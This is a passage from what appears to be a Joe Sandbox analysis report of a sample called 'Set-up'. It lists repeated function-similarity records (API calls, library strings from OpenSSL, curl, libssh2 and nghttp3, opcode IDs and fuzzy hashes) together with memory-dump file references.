                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy$__acrt_iob_func_errnofflushstrlen
                          • String ID: vtls/vtls.c
                          • API String ID: 1294796744-169717415
                          • Opcode ID: 6a2217757292f599f33cdcbca8a05c824cd3506372af60a2e5bfc76cbea1e995
                          • Instruction ID: 3022cd549501394eed8ed7827cc771631e4b56c056c1ebe2dc03c0404dab02ca
                          • Opcode Fuzzy Hash: 6a2217757292f599f33cdcbca8a05c824cd3506372af60a2e5bfc76cbea1e995
                          • Instruction Fuzzy Hash: 7BA141B0B02B02ABE7A08F65D845F12BBE8FF55744F08453DE948DB682FB71E9508B54
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000), ref: 001AE9A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: $BN_lshift$crypto/bn/bn_shift.c
                          • API String ID: 2221118986-2228461501
                          • Opcode ID: a5014677e8962e66802220eb46bc86e6b78f25d739ee9243cc5c7e9daabb3019
                          • Instruction ID: 69e6560eb7c3dcee2059166e4d23332685c70a5dcad15e778d92faeecb7cbd34
                          • Opcode Fuzzy Hash: a5014677e8962e66802220eb46bc86e6b78f25d739ee9243cc5c7e9daabb3019
                          • Instruction Fuzzy Hash: 0971FE75A087119BC729DF29C88062AF7E5AFDA310F058B2EFDA967391D770AC01CB41
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,001D05BF,00000000,00000000,input), ref: 00224986
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,?), ref: 002249D4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpystrlen
                          • String ID: crypto/property/property_string.c$ossl_property_string
                          • API String ID: 3412268980-3682758481
                          • Opcode ID: ed97972b58452dcc73235373a074482aa3ba71e0b120b67e9864c0c09e87b878
                          • Instruction ID: 1bcecb0458e5a9d468b53945f5936926f8d32cce108d24caf06b1d4fbda44457
                          • Opcode Fuzzy Hash: ed97972b58452dcc73235373a074482aa3ba71e0b120b67e9864c0c09e87b878
                          • Instruction Fuzzy Hash: 105104B6D547257BE711BAA4BC03F6B76989F14304F080034FD4896293FBA2E970C792
                          APIs
                          • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0021662C
                            • Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7262
                            • Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7285
                            • Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72C5
                            • Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strcpystrlen$memcmp
                          • String ID: crypto/ocsp/ocsp_vfy.c$ocsp_match_issuerid
                          • API String ID: 1653033214-3047229099
                          • Opcode ID: feccdb1aa4b5fefbdcd56ec67ef2fe6c72197dad9987ef6c25f14bbe415b151c
                          • Instruction ID: 4f8f3e81c55ff3442685842aa3fb82de20ac161c8579827e3ee3ba7b63e6906a
                          • Opcode Fuzzy Hash: feccdb1aa4b5fefbdcd56ec67ef2fe6c72197dad9987ef6c25f14bbe415b151c
                          • Instruction Fuzzy Hash: AC4107A5E5431276E6103A702C8BF9F32898F75748F140535FE09992C3FAA5DA7482A7
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000010,?,?,?,?,?,?,005A8D61,?), ref: 000A81A3
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?,?,?,?,?,?,?,?,005A8D61,?), ref: 000A81BD
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 000A822A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: dynhds.c
                          • API String ID: 3510742995-4001380837
                          • Opcode ID: 6d0c3c7a7c46a54bd7e195e4a129e16580b625b764df8034f0c80f5b8174f7e7
                          • Instruction ID: e9e59039cd162fe845ce31b62096c3abd427cb55971021b7609192a35616b69d
                          • Opcode Fuzzy Hash: 6d0c3c7a7c46a54bd7e195e4a129e16580b625b764df8034f0c80f5b8174f7e7
                          • Instruction Fuzzy Hash: 64416E71A04205AFDB18DF54D881B67BBA8EF95704F04C96DF9498B246EB30E914CB61
                          APIs
                          • EnterCriticalSection.KERNEL32(?), ref: 000E8769
                          • SleepConditionVariableCS.KERNEL32(?,?,000000FF), ref: 000E87D1
                            • Part of subcall function 000E88B0: QueryPerformanceFrequency.KERNEL32(?), ref: 000E88C1
                            • Part of subcall function 000E88B0: QueryPerformanceCounter.KERNEL32(?), ref: 000E88CC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: PerformanceQuery$ConditionCounterCriticalEnterFrequencySectionSleepVariable
                          • String ID:
                          • API String ID: 3112449238-0
                          • Opcode ID: 88cbabb22292ebe5edf68819a2055ad6f8e28d319944c8969f22dedf33f801f5
                          • Instruction ID: e7c0e5f690ebddafef357b08bd45a0ba177be87ed415ad1e46f96a24e4ad5ee9
                          • Opcode Fuzzy Hash: 88cbabb22292ebe5edf68819a2055ad6f8e28d319944c8969f22dedf33f801f5
                          • Instruction Fuzzy Hash: 26311A72B04281AFE7449A36DD45B6B77A9BB80300F14853CEC59E7191EF31ED14C791
                          APIs
                          • GetLastError.KERNEL32(001D7CCC,?,00000000,001D7127,001D7CCC,00000000,001FCAB7,00021A70), ref: 001D60E3
                          • SetLastError.KERNEL32(00000000), ref: 001D61A5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLast
                          • String ID: crypto/err/err.c$crypto/err/err_local.h
                          • API String ID: 1452528299-2963546075
                          • Opcode ID: f75a2a82b1fb2b4e5409dac7690b0d7154817ed56b4cbca5ae01f30d3190b4d4
                          • Instruction ID: 5999544d727df220d088c09d9317f32cb270bf6a801b27bdc125162ad637aaa2
                          • Opcode Fuzzy Hash: f75a2a82b1fb2b4e5409dac7690b0d7154817ed56b4cbca5ae01f30d3190b4d4
                          • Instruction Fuzzy Hash: 083145B5680306BAF7216F28AC47B763350BB8074DF440322FE14643D7E7B6A834CA91
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00050646
                            • Part of subcall function 0010F340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,000500B0,?,?,00000000,00000000,?), ref: 0010F35D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _time64strlen
                          • String ID: Attempt to set SFTP stats failed: %s$Unknown error in libssh2$vssh/libssh2.c
                          • API String ID: 3014104814-2439779272
                          • Opcode ID: 3147a8474f21f4c2515416fdb9a4f01233a741ebaacecb2bea75442f88c7d99f
                          • Instruction ID: a4cc95443ce1f8ab41454df32d653009267e67ee335411ec0a8988071329f28b
                          • Opcode Fuzzy Hash: 3147a8474f21f4c2515416fdb9a4f01233a741ebaacecb2bea75442f88c7d99f
                          • Instruction Fuzzy Hash: 4031F5B5A08601AFD7119F18D841B9EF7E4BF89324F044578F85C4B392E370BA28CB92
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00050594
                            • Part of subcall function 0010EE30: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0010EE4F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _time64strlen
                          • String ID: Unknown error in libssh2$mkdir command failed: %s$vssh/libssh2.c
                          • API String ID: 3014104814-3060469362
                          • Opcode ID: da9df92baa293b29fea8d8817ce57984ccb59796bbaa44467dff9d43b8b9acb3
                          • Instruction ID: af48bb73510017321a1c791c1a26c36b704bb17fae9be373ab33abdad7ad63db
                          • Opcode Fuzzy Hash: da9df92baa293b29fea8d8817ce57984ccb59796bbaa44467dff9d43b8b9acb3
                          • Instruction Fuzzy Hash: 1021B4B5A04601AFD7119F68D881A9AF7E4BF49324F048578F95C8B352E370AD18CB92
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,001971DD,00000000,?,?), ref: 001944AC
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?), ref: 001944FF
                            • Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7262
                            • Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7285
                            • Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72C5
                            • Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$strcpy$memcpy
                          • String ID: ASN1_STRING_set$crypto/asn1/asn1_lib.c
                          • API String ID: 1223016426-1431402185
                          • Opcode ID: e45ce270cf76e1f3dc7ee78c3b5d467384bdf66c1360e9d733aaede36bfda9bd
                          • Instruction ID: 0fc963eb93afb2ebfc3a6a021c98911a6b6eac37d99c86019e0454508d0a0325
                          • Opcode Fuzzy Hash: e45ce270cf76e1f3dc7ee78c3b5d467384bdf66c1360e9d733aaede36bfda9bd
                          • Instruction Fuzzy Hash: 00112BB1A0421457EF216E649C82F3B7798EB55750F160169FD59AB3C2FB60EC01C2F2
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - pbuf->last) == len,nghttp3_qpack.c,00000978), ref: 000CC4E7
                          Strings
                          • nghttp3_qpack.c, xrefs: 000CC4DD
                          • (size_t)(p - pbuf->last) == len, xrefs: 000CC4E2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: (size_t)(p - pbuf->last) == len$nghttp3_qpack.c
                          • API String ID: 1222420520-3384106985
                          • Opcode ID: b247268feb9fff6ce5546be9e94fd52f9cc628cf308139177104301d672c2041
                          • Instruction ID: 8b31552b39ddf4d823356d6a7a38b2aed5b20ef404917f079f46e743af9594a5
                          • Opcode Fuzzy Hash: b247268feb9fff6ce5546be9e94fd52f9cc628cf308139177104301d672c2041
                          • Instruction Fuzzy Hash: 7781D471A083409FE7189F2CC894F2EB7D2EB99714F18867CE8998B3E2D635DC458785
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - rbuf->last) == len,nghttp3_qpack.c,000004D0,?,?,?,?,?,?,000CB434,?,?,00000000,00000000,?,?), ref: 000CC68A
                          Strings
                          • nghttp3_qpack.c, xrefs: 000CC680
                          • (size_t)(p - rbuf->last) == len, xrefs: 000CC685
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: (size_t)(p - rbuf->last) == len$nghttp3_qpack.c
                          • API String ID: 1222420520-2159148421
                          • Opcode ID: 779aab22b3599167651044216416c7918d27d969e098fcb638be22c5310f7523
                          • Instruction ID: f4d087c823d19e051a4ca7495134cec86c9b034114e69852da77722751abf07b
                          • Opcode Fuzzy Hash: 779aab22b3599167651044216416c7918d27d969e098fcb638be22c5310f7523
                          • Instruction Fuzzy Hash: 9A41E2717082005FE7099B28D894F6EBBD2EBD9314F18857CE88DCB392D935DD458785
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len,nghttp3_qpack.c,00000EB7,?,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 000D27D1
                          Strings
                          • nghttp3_qpack.c, xrefs: 000D27C7
                          • nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len, xrefs: 000D27CC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
